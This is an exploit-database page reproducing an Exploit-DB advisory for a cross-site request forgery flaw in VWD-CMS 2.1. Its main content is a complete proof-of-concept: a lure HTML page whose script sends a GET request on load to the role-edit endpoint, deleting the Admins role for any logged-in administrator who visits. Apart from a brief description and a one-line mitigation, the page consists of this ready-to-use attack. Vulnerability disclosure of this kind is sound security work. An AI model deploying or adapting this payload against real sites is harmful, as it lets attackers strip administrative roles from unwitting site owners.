header-logo
Suggest Exploit
vendor:
VWD-CMS
by:
abysssec.com
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: VWD-CMS
Affected Version From: VWD-CMS version 2.1
Affected Version To: VWD-CMS version 2.1
Patch Exists: YES
Related CWE: N/A
CPE: a:vwd-cms:vwd-cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

VWD-CMS CSRF Vulnerability

The VWD-CMS have CSRF Vulnerability in order to remove any Role especially Admins Role. With this Vulnerability, an attacker can navigate the admin to visit a malicious site (when he is already logged in) to remove a role. The malicious site contains an HTML file with AJAX code and a GET method for this operation, which is enough to make the admin meet it.

Mitigation:

Implementing a CSRF token in the application can help mitigate this vulnerability.
Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 


 
 
  Title            :  VWD-CMS CSRF Vulnerability
  Affected Version :  VWD-CMS version 2.1
  Discovery        :  www.abysssec.com
  Vendor	   :  http://www.vwd-cms.com/

  Demo  	   :  http://server/templates/Emerald.aspx
		      http://server/templates/balloonr.aspx

  Download Links   :  http://vwdcms.codeplex.com/
  
  Admin Page       :  http://Example.com/login.aspx
  
http://www.exploit-db.com/moaub-20-vwd-cms-csrf-vulnerability/
'''
 
1)CSRF :
===========================================================================================      
  The VWD-CMS have CSRF Vulnerability in order to remove any Role especially Admins Role. 
  With this Vulnerability you can navigate the admin to visit malicious site (when he is already logged in) 
  to remove a role.

 In this path a role could be removed::
        http://Example.com/VwdCms/Members/RoleEdit.aspx?delete=yes&role=RoleName
        (RoleName can be Admins or Members)
  
  here is HTML File with AJAX Code and with GET Method for this operation that is enough to Admin meet it.


The Source of HTML Page (Malicious Site) 
===========================================================================================     
  

<html>
<head>
<title >Wellcome to My Site!</title>
Hello!
...
...
...
This page remove Admins Role in VWD-CMS. 

<script>          
        function RemoveRole() {            
            try {
                netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
            } catch (e) {}

            var http = false;
            if (window.XMLHttpRequest) {
                http = new XMLHttpRequest();
            }
            else if (window.ActiveXObject) {
                http = new ActiveXObject("Microsoft.XMLHTTP");                
            }

            url = "http://server/VwdCms/Members/RoleEdit.aspx?delete=yes&role=Admins";
            http.onreadystatechange = done;
            http.open('GET', url, true);
            http.send(null);
        }
        function done() {
            if (http.readyState == 4 && http.status == 200) 
            {               
            }
        }     
</script>
</head>
<body onload ="RemoveRole();">
</body>
</html>



===========================================================================================

Navigation

Suggest Exploit

Services By CQR